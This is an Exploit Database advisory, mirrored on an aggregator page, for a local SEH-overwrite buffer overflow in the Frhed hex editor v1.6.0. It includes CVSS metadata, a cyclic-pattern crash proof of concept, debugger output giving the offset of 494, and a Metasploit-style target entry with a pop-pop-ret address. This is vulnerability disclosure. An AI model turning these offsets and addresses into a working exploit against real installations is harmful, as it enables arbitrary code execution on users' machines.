Frhed (Free hex editor) v1.6.0 – Buffer overflow

• Exploit Database
• 123 阅读

• 作者： Rafael Pedrero
  日期： 2023-03-27
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51078/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48

  # Exploit Title: Frhed (Free hex editor) v1.6.0 - Buffer overflow # Discovery by: Rafael Pedrero # Discovery Date: 2022-01-09 # Vendor Homepage: http://frhed.sourceforge.net/ # Software Link : http://frhed.sourceforge.net/ # Tested Version: 1.6.0 # Tested on:Windows 10   CVSS v3: 7.3 CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H CWE: CWE-119   Buffer overflow controlling the Structured Exception Handler (SEH) records in Frhed (Free hex editor) v1.6.0, and possibly other versions, may allow attackers to execute arbitrary code via a long file name argument.   Proof of concept:   Open Frhed.exe from command line with a large string in Arguments, more than 494 chars:   File &apos;<Frhed_PATH>\Frhed.exe&apos; Arguments &apos;Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...&apos;   SEH chain of main thread AddressSE handler 0018FC8C 41367141 35714134 *** CORRUPT ENTRY ***   0BADF00D [+] Examining SEH chain 0BADF00D SEH record (nseh field) at 0x0018fc8c overwritten with normal pattern : 0x35714134 (offset 494), followed by 876 bytes of cyclic data after the handler   0BADF00D ------------------------------ &apos;Targets&apos;=> [ [ &apos;<fill in the OS/app version here>&apos;, { &apos;Ret&apos; =>0x00401ba7, # pop ecx # pop ecx # ret- Frhed.exe (change this value by other without \x00) &apos;Offset&apos;=>494 } ], ],